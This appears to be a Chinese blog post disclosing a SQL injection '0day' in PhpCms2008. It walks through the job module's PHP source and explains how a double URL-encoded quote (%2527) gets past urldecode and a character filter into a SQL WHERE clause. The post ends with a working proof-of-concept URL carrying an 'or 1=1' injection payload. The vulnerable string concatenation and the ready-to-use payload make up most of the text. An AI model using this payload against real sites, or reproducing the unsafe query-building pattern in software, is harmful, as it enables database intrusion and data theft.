PhpCms2008 注射漏洞0day
代码分析说明:
01 case ”list”:
02 $catid = intval($catid);
03 $head[”keywords”] .= ”职位列表”;
04 $head[”title”] .= ”职位列表”.”_”.$PHPCMS[”sitename”];
05 $head[”description”] .= ”职位列表”.”_”.$PHPCMS[”sitename”];
06 $templateid = ”job_list”;
07 if($inputtime)
08 $time = time() – 3600*$inputtime*24;
09 else $time = 0;
10 if($time < 0 )$time = 0;
11 $where = "j.updatetime >= ”{$time}” ";
12 $genre = urldecode($genre); //urldecode URL解码,两个编码,突破单引号,%2527。
13 $genre = str_replace(array(”(”, ”$”, ”)”, ”{”, ”}”, ”<”, ”>”), ””, $genre); //作者突然蛋定了一下,给我们带来了麻烦。继续往下看。
14 if($station)$where .= "AND j.station = ”{$station}” ";
15 if($genre)$where .= "AND c.genre = ”{$genre}” ";
16 if(!trim($where))$where = ”1”;
17 break;
18
19 case ”searchlist”:
20 //………..
21 case ”search”:
22 //………..
23 case ”applylist”;
24 $head[”keywords”] .= ”简历列表”;
25 $head[”description”] .= ”简历列表”.”_”.$PHPCMS[”sitename”];
26 $head[”title”] .= ”简历列表”.”_”.$PHPCMS[”sitename”];
27 $templateid = ”job_applylist”;
28
29 if($inputtime)
30 $time = time() – 3600*$inputtime*24;
31 else $time = 0;
32 if($time < 0 )$time = 0;
33 $where = "edittime >= ”{$time}” ";
34 $genre = urldecode($genre); //好~~~
35 if($experience)$where .= "AND experience >= ”{$experience}” ";
36 if($genre)$where .= "AND edulevel = ”{$genre}” "; //成功进SQL语句。
漏洞测试:
http://127.0.0.1/phpcms/yp/job.php?action=applylist&genre=1111%2527or%201=1%23
0 条评论。